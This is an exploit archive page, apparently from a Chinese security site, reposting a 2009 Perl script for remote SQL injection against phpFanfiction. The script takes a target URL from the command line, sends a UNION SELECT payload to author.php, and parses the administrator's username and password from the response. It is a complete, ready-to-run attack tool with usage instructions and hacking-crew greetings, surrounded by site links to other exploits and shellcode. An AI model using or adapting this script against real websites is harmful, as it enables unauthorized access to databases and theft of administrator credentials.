首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpFanfiction remote SQL injection exploit that attempts to pull the admin accou
来源:http://sux0r.net/ 作者:S3T4N 发布时间:2009-06-30  
#!/usr/bin/perl
#**********************************************************#
#phpFanfiction [Remote SQL injection]
#**********************************************************#
#Greetz
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net
#VOP Crew [Vaksin13 * OoN_Boy * Paman]
#R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro *
#zxvf * Pizzyroot * iwannine
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]
#*********************************************************#

use HTTP::Request;
use LWP::UserAgent;

$bug = "author.php?id=-1";
$sql = "+union+select+1,2,3,4,concat(0x21,user_name,0x3a,user_password,0x21),6,7 from+user+where+user_id=1--";

print "\n ************************************************\n";
print " *     	phpFanfiction [Remote SQL injection]	*\n";
print " *		disclosure by S3T4N 	   	*\n";
print " *	 	  sux0r.net			*\n";
print " ************************************************\n\n";

if (@ARGV != 1) { &help; exit(); }

sub help(){
	print " [?] Use : perl $0 www.target.com\n";
	print "           perl $0 www.target.com/path\n\n";
}

if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
print " [SQL] Exploiting ...\n\n";

my $injection = $target.$bug.$sql;
my $request   = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
	my $res   = $response->content;
	if ($res =~ m/!(.*):(.*)!/g) {
		my ($username,$passwd) = ($1,$2);
		print " [target] $target \n";
		print " [loginx] $username:$passwd \n\n";
	}
	else { print " [SQL] Error, Fail to get admin login.\n\n"; }
}
else { print " [SQL] Error, ".$response->status_line."\n\n"; }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Versions 1.0.1 and below of th
·Versions 1.1 and below of the
·TFM MMPlayer 2.0 (m3u/ppl) Uni
·linux/x86 reboot() polymorphic
·SMF Mod Member Awards 1.0.2 Bl
·linux/x86 execve shellcode gen
·Messages Library 2.0 Arbitrary
·Newsolved 1.1.6 (login grabber
·MyEgy Script suffers from a re
·Joomla com_bookflip (book_id)
·HT-MP3Player 1.0 (.ht3) Univer
·Almnzm (COOKIE: customer) Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved